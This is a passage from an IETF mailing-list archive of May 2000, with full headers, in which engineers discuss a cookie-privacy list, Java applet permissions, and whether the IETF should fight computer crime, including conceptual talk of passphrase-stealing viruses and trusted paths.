d.NO ADVICE OR INFORMATION, WHETHER ORAL OR WRITTEN, OBTAINED BY YOU
FROM WIMBA OR THROUGH OR FROM THE SERVICE SHALL CREATE ANY WARRANTY
NOT EXPRESSLY STATED IN THE AGREEMENT.
15. LIMITATION OF LIABILITY
YOU EXPRESSLY UNDERSTAND AND AGREE THAT WIMBA SHALL NOT BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL OR EXEMPLARY
DAMAGES, INCLUDING BUT NOT LIMITED TO, DAMAGES FOR LOSS OF PROFITS,
GOODWILL, USE, DATA OR OTHER INTANGIBLE LOSSES (EVEN IF WIMBA HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES), RESULTING FROM: (i) THE USE OR
THE INABILITY TO USE THE SERVICE; ...
>From owner-ietf-outbound Mon May 22 15:20:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA08428
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:20:03 -0400 (EDT)
Received: from dirty.research.bell-labs.com (ns1.research.bell-labs.com [204.178.16.6])
by ietf.org (8.9.1a/8.9.1a) with SMTP id OAA07900
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 14:58:02 -0400 (EDT)
Received: from scummy.research.bell-labs.com ([135.104.2.10]) by dirty; Mon May 22
14:57:12 EDT 2000
Received: from starling.research.bell-labs.com ([135.104.26.187]) by scummy; Mon May
22 14:57:11 EDT 2000
Received: from research.bell-labs.com (blmhbossy-pc.research.bell-labs.com
[135.104.26.103])
by starling.research.bell-labs.com (8.9.1/8.9.1) with ESMTP id OAA13464;
Mon, 22 May 2000 14:57:08 -0400 (EDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 14:57:08 -0400
From: Tom Limoncelli <[EMAIL PROTECTED]>
Organization: Division of division division.
X-Mailer: Mozilla 4.7 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Eric Brunner <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [HTTP-State] New mailing list for data protection & privacy (cookies
et al)
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Just a small correction. The http-state mailing list is David Kristol's,
not mine. I'm simply his humble sysadmin that hosts the list.
--tal
Eric Brunner wrote:
>
> I've set up a mailing list for discussion of policy implications of http
> cookies, and other persistent session artifacts which may be used as
> identifiers. We've list(s) for discussion of the mechanism(s), e.g., Tom
> Limoncelli's http-state list, the W3C P3P interop list, the mozilla general
> list, and of course the overworked ietf general list. These all tend to
> progress towards implementations, not towards user documentation.
>
> What I'd like to see is something along the lines of a draft in the IETF's
> User Services Area which is updated to reflect the changes of mechanism(s)
> employed, and what effect these have for user data protection and on-line
> privacy, modified for the browser, host and "idiot's guide" genre of user
> documentation. Rather than write a -00.txt draft first, then solicit any
> technical contributions, I've set up the contribution list first.
>
> Writing for the IESG, Keith Moore and Ned Freed have produced "Use of HTTP
> State Management" <draft-iesg-http-cookies-03.txt>, intended as a BCP RFC.
> This is a step in the right direction, and one that can be improved upon
> and made "accessible" to the general reader.
>
> To subscribe, simply send mail to:
>
> [EMAIL PROTECTED]
>
> The usual majordomo rules apply.
>
> Cheers,
> Eric
>
> _______________________________________________
> HTTP-State mailing list
> [EMAIL PROTECTED]
> http://lists.bell-labs.com/mailman/listinfo/http-state
>From owner-ietf-outbound Mon May 22 15:30:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA08666
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:30:03 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA08249
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 15:10:16 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id MAA02199;
Mon, 22 May 2000 12:09:49 -0700 (PDT)
Date: Mon, 22 May 2000 12:09:49 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: asynchronous audio conferencing at www.wimba.com
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Matt,
Thanks for your message:
> As a linguistic exercise, you might reconcile this message, which you
> get when you refuse to grant their applets read/write/delete/execute
> access to all your files:
>
> In order to run the Wimba forums application, you will need to
> grant our applet a certain number of privileges. Our applet is
> signed to reassure you of its authenticity and safety. You can
> trust our applet.
>
> with their terms of use:
>
> c.ANY MATERIAL DOWNLOADED OR OTHERWISE OBTAINED THROUGH THE USE OF
> THE SERVICE IS DONE AT YOUR OWN DISCRETION AND RISK...
When is the last time a so-called "self-extracting archive"
(more and more of which are actually unsigned installer applications)
asked and respected your permission to read your files? The
microphone in Java is probably in the same category of file sources
as the file system. I wish Sun would have the good sense to make
microphone input a seperate sandbox security category so that systems
like Wimba wouldn't have to ask for multiple seemingly unrelated and
forboding-sounding permissions.
How do you reconcile the use restrictions at www.tutor.com (e.g.,
against Cuba and wherever else the U.S. State Department says) with
articles 26 and 27 of the Universal Declaration of Human Rights?
Cheers,
James
>From owner-ietf-outbound Mon May 22 15:40:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA08905
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:40:03 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA08308
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 15:15:19 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id 8DBFC4CE01; Mon, 22 May 2000 15:15:19 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id PAA11506;
Mon, 22 May 2000 15:15:19 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 2421535DC2; Mon, 22 May 2000 15:15:12 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
Cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 22 May 2000 15:15:12 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <v04210103b54f26125316@[130.237.150.138]>, Jacob Palme writes:
>Does there exist a mailinglist specially oriented towards
>cybercrime and its prevention? If not, should we start such
>a list?
I don't know of any such list. But -- as we've learned in the IETF
about working group charters -- unless it's very narrowly focused, it's
just going to turn into a flamefest, and won't contribute at all to any
real solutions. For example, the techniques necessary to deal with
DDoS flooding attacks are not at all related to the techniques that one
would use to combat your favorite form of "illegal" content (kiddie
porn, Nazi propaganda, Metallica MP3s, truthful and accurate
information about the local dictatorship, etc.).
--Steve Bellovin
>From owner-ietf-outbound Mon May 22 15:50:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA09081
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA08351
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 15:18:03 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA28570;
Mon, 22 May 2000 15:17:57 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: "Steven M. Bellovin" <[EMAIL PROTECTED]>,
Jacob Palme <[EMAIL PROTECTED]>,
IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-reply-to: Your message of "Mon, 22 May 2000 18:28:23 +0200."
<[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 15:17:57 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> I would hope that any software I use, that is able to put my digital
> signature on some data, would ask me for my pass-phrase every time
> my private key is used.
and I would hope that any software I used would not offer to execute
content that could have harmful side effects, without first warning
me in very clear language that this could happen.
software in the real world rarely does all that is hoped for.
Keith
>From owner-ietf-outbound Mon May 22 17:00:48 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA09701
for [EMAIL PROTECTED]; Mon, 22 May 2000 17:00:01 -0400 (EDT)
Received: from cuimail.unige.ch (cuimail.unige.ch [129.194.69.50])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA09667
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 16:53:38 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from cuimail.unige.ch ([129.194.69.17])
by cuimail.unige.ch (PMDF V5.2-32 #37942)
with ESMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Mon,
22 May 2000 22:53:37 +0200 (MET DST)
X-URL: http://cui.unige.ch/eao/www/Bertrand.html
Date: Mon, 22 May 2000 22:53:37 +0200
X-Face: $LChH{%os*16AP:(5pI<*1fqtXx?14aOqKLUfv{>&:+,G6Y+ei9aTSM:D,ie2w=~vr9nsSj
FY4bH+)|=<_V|1@4";>_aJ}QxqfL['1]O3i`)wmc]#,^4Ny#&_|k?EEcrb7aIle|fs742v:5WjNM9#
ufe5itBNu-z*[']\@b|ut#z,r8b#ax^CsUUku2I#bgvZ&XxZ/kc#7Gi{5OB%h88yly"YZG*u}jD^tL
wUfdV#%YU.|hU|HEOfSCGxb
Subject: Re: Should IETF do more to fight computer crime?
To: IETF general mailing list <[EMAIL PROTECTED]>
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
X-Mailer: exmh version 2.0.2 2/24/98
Content-type: text/plain; charset=us-ascii
X-Loop: [EMAIL PROTECTED]
"Steven M. Bellovin" <[EMAIL PROTECTED]> said:
> in the Holy Name of Convenience, many (most?) mailers permit a
> passphrase to be cached for some amount of time. A virus could
> exploit that.
Ok. So, you're reasoning on the assumption that the user and her system
enginer are both incompetent, that the software being used cannot be trusted
and that a virus is potentially already active on the user's system. Under
such assumptions, what do you foresee as a possible solution?
When I said:
>I would hope that any software I use, that is able to put my digital signature
>on some data, would ask me for my pass-phrase every time my private key is
>used.
I meant that these were my requirements for a reliable system. But, unless I
were to be provided with all the sources and took the time to carefully analyze
them, I would, in the end, still be relying on somebody else's "promise" that
the software doesn't do anything stupid with my private key. The least I could
do, though, is to check that the system I use at least pretends to be doing
what I consider safe to do. Still, when I disable scripting in my mail user
agent and my browser, can I be 100% sure that no script will ever be executed?
"Steven M. Bellovin" <[EMAIL PROTECTED]> also said:
> A virus [snip] could wait until you tried sending
> some signed mail, and grab the key then. It could even wait, and
> then pop up its own key window that masquerades as the real one,
> followed by a box saying that you entered your passphrase
> incorrectly, and that you should retry it, in the real prompt. There
> are operating system techniques that can prevent that latter attack,
> such as the "trusted path".
Interesting. Do you have a reference (preferably a URL) that describes the
"trusted path" technique?
Peace,
Bertrand Ibrahim.
--------------------------------------------
[EMAIL PROTECTED]
http://cui.unige.ch/eao/www/Bertrand.html
>From owner-ietf-outbound Mon May 22 17:40:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10225
for [EMAIL PROTECTED]; Mon, 22 May 2000 17:40:02 -0400 (EDT)
Received: from tsx-prime.MIT.EDU (TSX-PRIME.MIT.EDU [18.86.0.76])
by ietf.org (8.9.1a/8.9.1a) with SMTP id RAA10113
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 17:33:07 -0400 (EDT)
Received: by tsx-prime.MIT.EDU
with sendmail-SMI-8.6/1.2, id RAA05440; Mon, 22 May 2000 17:29:33 -0400
Date: Mon, 22 May 2000 17:29:33 -0400
Message-Id: <[EMAIL PROTECTED]>
From: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
CC: IETF general mailing list <[EMAIL PROTECTED]>
In-reply-to: Jacob Palme's message of Mon, 22 May 2000 20:14:55 +0200,
<v0421010ab54f27b8b658@[130.237.150.138]>
Subject: Re: Should IETF do more to fight computer crime?
Phone: (781) 391-3464
X-Loop: [EMAIL PROTECTED]
Date: Mon, 22 May 2000 20:14:55 +0200
From: Jacob Palme <[EMAIL PROTECTED]>
They went to the police (in the USA) saying that this
person had infringed on their copyright by publishing
their secret documents on Usenet. The police in the
USA contacted the police in Finland. The police in
Finland went to the anonymity server and gave him
to choices: Either we take the whole server, or you
tell us who is behind this pseudonym. He told them
under duress who it was. But shortly after that, he
shut down the server.
Should the Finnish police really have done this?
Should he have accepted their requests, or should
he have called a lawyer and tried to move the issue
of whehter to divulge this information into the
courts in Finland?
This is a social issue, and not a technical issue. You might want to
consider asking this question in an EFF forum, instead of the IETF
mailing list.
- Ted
>From owner-ietf-outbound Mon May 22 19:30:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA11138
for [EMAIL PROTECTED]; Mon, 22 May 2000 19:30:02 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA11039
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 19:21:42 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id RAA20825
for [EMAIL PROTECTED] env-from <vjs>;
Mon, 22 May 2000 17:21:41 -0600 (MDT)
Date: Mon, 22 May 2000 17:21:41 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: Should IETF do more to fight computer crime?
X-Loop: [EMAIL PROTECTED]
> From: [EMAIL PROTECTED]
> > in the Holy Name of Convenience, many (most?) mailers permit a
> > passphrase to be cached for some amount of time. A virus could
> > exploit that.
>
> Ok. So, you're reasoning on the assumption that the user and her system
> enginer are both incompetent, that the software being used cannot be trusted
> and that a virus is potentially already active on the user's system.
Without belaboring whether the word "incompetent" is appropriate (I
think it is), what is the difference between that hypothetical and
the current real world? Almost all of the bazillions of flavors of
Microsoft virus are based on that same Holy Name of User Friendliness.
No competently designed or implemented system since at least a decade
before those three guys hacked that BASIC interpretor in about 1973
has had the design holes that infest--uh--enhance the user's experience
of all flavors of Windows as installed by default through at least
Windows 98 SE and Window NT 4.0+service pack 6.
> I meant that these were my requirements for a reliable system. But, unless I
>were to be provided with all the sources and took the time to carefully analyze
> them, I would, in the end, still be relying on somebody else's "promise" that
> the software doesn't do anything stupid with my private key.....
Do you momentarily cringe when you give your car keys to a mechanic or
parking attendant? Do you give your house keys to every stranger who
expresses an interest in cleaning your drapes or checking your closets
for snipes? How can one not expect to need to perform similar due
diligence with the keys to your data?
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 22 21:20:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA11923
for [EMAIL PROTECTED]; Mon, 22 May 2000 21:20:03 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA11864
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 21:11:00 -0400 (EDT)
Received: from [130.237.161.46] (dsvmc046.dsv.su.se [130.237.161.46])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id DAA08495;
Tue, 23 May 2000 03:11:00 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210106b54f89d2be52@[130.237.161.46]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Tue, 23 May 2000 03:09:28 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 18.28 +0200 0-05-22, [EMAIL PROTECTED] wrote:
>I would hope that any software I use, that is able to put
>my digital signature on some data, would ask me for my
>pass-phrase every time my private key is used. I would
>even hope that such software wouldn't be able to use my
>private key without the pass-phrase, otherwise anybody
>with access to my computer could easily forge my signature.
It is not easy to design encryption software which cannot
be corrupted by viruses. A virus could catch your passphrase,
and then use it itself for nefarious purposes. That is why
many people want to use smart cards. But I am not sure they
are secure. A virus could catch the communication to and
from your smart card. And developers of smart cards seem
to want to put so much functionality in the card itself,
that it becomes open to viruses in itself.
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 22 21:30:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA12009
for [EMAIL PROTECTED]; Mon, 22 May 2000 21:30:03 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA11875
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 21:11:11 -0400 (EDT)
Received: from [130.237.161.46] (dsvmc046.dsv.su.se [130.237.161.46])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id DAA08513;
Tue, 23 May 2000 03:11:11 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210104b54f87a63bb9@[130.237.161.46]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Tue, 23 May 2000 03:13:33 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 15.17 -0400 0-05-22, Keith Moore wrote:
>> I would hope that any software I use, that is able to put my digital
>> signature on some data, would ask me for my pass-phrase every time
>> my private key is used.
>
> and I would hope that any software I used would not offer to execute
> content that could have harmful side effects, without first warning
> me in very clear language that this could happen.
>
> software in the real world rarely does all that is hoped for.
That would mean that every time you execute any program, you would
have to get an analysis of its possible harmful effects and decide
whether to accept it. Possibly, the system could be designed so
that a checksum is stored with every executable program, and you
do not have to answer this question if the checksum has not
changed since the last time you executed the same program.
Unfortunately, it is not always easy to avoid executing programs
with harmful content. Especially troublesome are installation
programs, which very often install things you do not want (such
as older versions of software you already have newer versions of,
or modules you do not want). America Online is especially well-
known for this, and unfortunately, since they bought Netscape,
they have added unwanted installation also to Netscape itself.
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 22 23:00:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA14399
for [EMAIL PROTECTED]; Mon, 22 May 2000 23:00:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA14340
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 22:51:11 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4N2pBn29080;
Mon, 22 May 2000 22:51:11 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-reply-to: Your message of "Tue, 23 May 2000 03:13:33 +0200."
<v04210104b54f87a63bb9@[130.237.161.46]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
<v04210104b54f87a63bb9@[130.237.161.46]>
Date: Mon, 22 May 2000 22:51:10 -0400
X-Loop: [EMAIL PROTECTED]
On Tue, 23 May 2000 03:13:33 +0200, Jacob Palme <[EMAIL PROTECTED]> said:
> That would mean that every time you execute any program, you would
> have to get an analysis of its possible harmful effects and decide
> whether to accept it. Possibly, the system could be designed so
> that a checksum is stored with every executable program, and you
> do not have to answer this question if the checksum has not
> changed since the last time you executed the same program.
This idea isn't as secure as it seems. For any given useful
program 'foobar' that you are invoking again, you probably have
different input data (otherwise, why are you bothering running
it again to get the same result as last time? ;)
Remember that in 98% of the now-boring 'Yet Another Buffer Overflow'
cases, the checksum and permitted actions for the program were
unchanged, had been unchanged for possibly YEARS - but the program
coughs up a hairball when stressed with different input data.
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Tue May 23 02:51:02 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA27849
for [EMAIL PROTECTED]; Tue, 23 May 2000 02:50:02 -0400 (EDT)
Received: from smtp10.atl.mindspring.net (smtp10.atl.mindspring.net [207.69.200.246])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA27794
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 02:41:34 -0400 (EDT)
Received: from alpha ([209.138.202.17])
by smtp10.atl.mindspring.net (8.9.3/8.8.5) with ESMTP id CAA30025;
Tue, 23 May 2000 02:41:29 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Tue, 23 May 2000 01:36:46 -0500
To: Jacob Palme <[EMAIL PROTECTED]>
From: Chet Uber <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
In-Reply-To: <v04210106b54f89d2be52@[130.237.161.46]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id CAA27794
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
At 03:09 AM 5/23/00 +0200, you wrote:
>At 18.28 +0200 0-05-22, [EMAIL PROTECTED] wrote:
> >I would hope that any software I use, that is able to put
> >my digital signature on some data, would ask me for my
> >pass-phrase every time my private key is used. I would
> >even hope that such software wouldn't be able to use my
> >private key without the pass-phrase, otherwise anybody
> >with access to my computer could easily forge my signature.
>
>It is not easy to design encryption software which cannot
>be corrupted by viruses. A virus could catch your passphrase,
>and then use it itself for nefarious purposes. That is why
>many people want to use smart cards. But I am not sure they
>are secure. A virus could catch the communication to and
>from your smart card. And developers of smart cards seem
>to want to put so much functionality in the card itself,
>that it becomes open to viruses in itself.
First, The idea of a standards committee working to "fight computer crime"
is a pipe-dream. You might as well ask ..... The issue is building
software/firmware/hardware that works and is as secure as possible. We all
have heard the story about secure computing on a network, so we shall be
spared the sophism. One could argue the theoretical flaws to almost any
system -- and not do anything but waste bandwidth.
We are engineers and scientists working to solve technical problems
securely. We are not lawyers to intermix Title 18 Sec. 1030 style codes in
with our IP headers, they pay the "suits" do those things. We can have
strong resolve that these problems mean that work from the groups on secure
time stamping, strong encryption, AAA, etc. etc. make for a more "solid
chain of custody" for a "reasonable prudent man."
In other words, doing those things that we are already chartered to do
would make sense and new work to create secure mechanisms within the
framework of the IETF-IESG-IAB should help to "fight computer crime." And
all this without making changes to "fight computer crime."
Second, The issue of law in today's arena does not provide for a
non-jurisdictional universe. I mean the Jupiter Bureau of Investigations
(JBI) will deal with the Internet within the 10,000 km terrestrial boundary
and within, no one on Earth will have jurisdiction here. Each country, each
state, each county, and each city have different values and mores. The fact
that people from around the world can be your virtual neighbors has
generated a buzz word around eCommerce - The Death Of Distance. The problem
is that while they virtually in proximity; they are really nine time zones
away and are separated by several geographical jurisdictional boundaries
(not to mention diplomatic boundaries).
Finally, I believe it was Steven's comment that it is very difficult to
build a secure system that has selective levels of security; thus allowing
law enforcement more easy access.
To me it is this simple --- Continue to support promising new IP versions
(IPv6). Get IPsec to actually work with current IPv4 systems across all
hardware and software boundaries. Revitalize the use of already existing
secure protocols. Embrace the spread of IETF members from the security area
into other areas of the IETF; or better yet. seek them out and ask them
about possible concerns you have about your latest ID, RFC, thought et al.
WE ARE NOT a part of the United States Justice Department. We (for the most
part) are not lawyers or judges or law enforcement personnel; and we sure
as hell don't play them on TV. Stick with protocols, not attempts to be in
the Justice Department.
Please understand that I am not against the United States Justice
Department and the National Security Agency wanting the ability to obtain
legal wiretap information. I am against becoming the jack-booted thugs of
ambitious bureaucrats, not wanting to do their own dirty work. If they want
this so bad, let them pass-the-laws, obtain the money, and expend the
all-important-political-capital to make a pipe dream like this happen.
Protocols not Codification!!!!!!
Warmest Regards,
Chet Uber
Deputy Director of Operations
Incident Response Team Leader
NEbraskaCERT (c). 7660 Dodge, Omaha, NE 68114
vox 402-498-2673 fax 402-391-3906
[EMAIL PROTECTED] www.NEbraskaCERT.org
"Are you in a Security State of Mind?" © 1998-2000
"Quis custodiet ipsos custodes?"
"Who watches the watchmen?" - Juvenal, Satires, VI, 347
>From owner-ietf-outbound Tue May 23 06:00:29 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA28969
for [EMAIL PROTECTED]; Tue, 23 May 2000 06:00:02 -0400 (EDT)
Received: from typhoon.mail.pipex.net (typhoon.mail.pipex.net [158.43.128.27])
by ietf.org (8.9.1a/8.9.1a) with SMTP id FAA28922
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 05:56:32 -0400 (EDT)
Received: (qmail 4475 invoked from network); 23 May 2000 09:56:32 -0000
Received: from usern035.uk.uudial.com (HELO GK-VAIO.Dial.pipex.com) (193.149.81.68)
by smtp.dial.pipex.com with SMTP; 23 May 2000 09:56:32 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Tue, 23 May 2000 09:21:51 +0100
To: Jacob Palme <[EMAIL PROTECTED]>
From: Graham Klyne <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Cc: IETF general mailing list <[EMAIL PROTECTED]>
In-Reply-To: <v04210104b54f87a63bb9@[130.237.161.46]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 03:13 AM 5/23/00 +0200, Jacob Palme wrote:
>That would mean that every time you execute any program, you would
>have to get an analysis of its possible harmful effects and decide
>whether to accept it. [...]
Bruce Schneier's recent Crypto-gram (15 May) newsletter (see
http://www.counterpane.com/) contains an essay making the point (among
others) that computer systems security is precisely about risk management,
which means, among other things, making decisions about acceptable levels
of risk.
#g
------------
Graham Klyne
([EMAIL PROTECTED])
>From owner-ietf-outbound Tue May 23 09:10:41 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA03121
for [EMAIL PROTECTED]; Tue, 23 May 2000 09:10:02 -0400 (EDT)
Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA02989
for <[EMAIL PROTECTED]>; Tue, 23 May 2000 09:04:02 -0400 (EDT)
Received: from mboxes.jrc.it (mboxes.jrc.it [139.191.1.63])
by mrelay.jrc.it (LMC5692) with ESMTP id PAA16393; Tue, 23 May 2000 15:03:02
+0200 (MET DST)
Received: from jrc.it (139.191.71.153) by mboxes.jrc.it; 23 May 2000 15:03:02 +0200
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Tue, 23 May 2000 15:03:54 +0200
From: Jean-Paul Jeral <[EMAIL PROTECTED]>
Organization: EC-JRC Ispra
X-Mailer: Mozilla 4.5 [en] (X11; I; SunOS 5.6 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: Fred Baker <[EMAIL PROTECTED]>
CC: Anders Feder <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: Universal Network Language
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi,
Fred Baker wrote:
>
> At 11:01 PM 4/20/00 +0200, Anders Feder wrote:
> >The translation system being developed for the United Nations, the Universal
> >Network Language (UNL), looks quite promising. Does the IETF have any plans
> >regarding this system?
>
> not specifically. Care to make an argument that we should?
(1)
http://www.unl.ias.unu.edu/publications/gm/breaking/bre/brk-02.htm
states that:
`UNL represents sentences in the form of
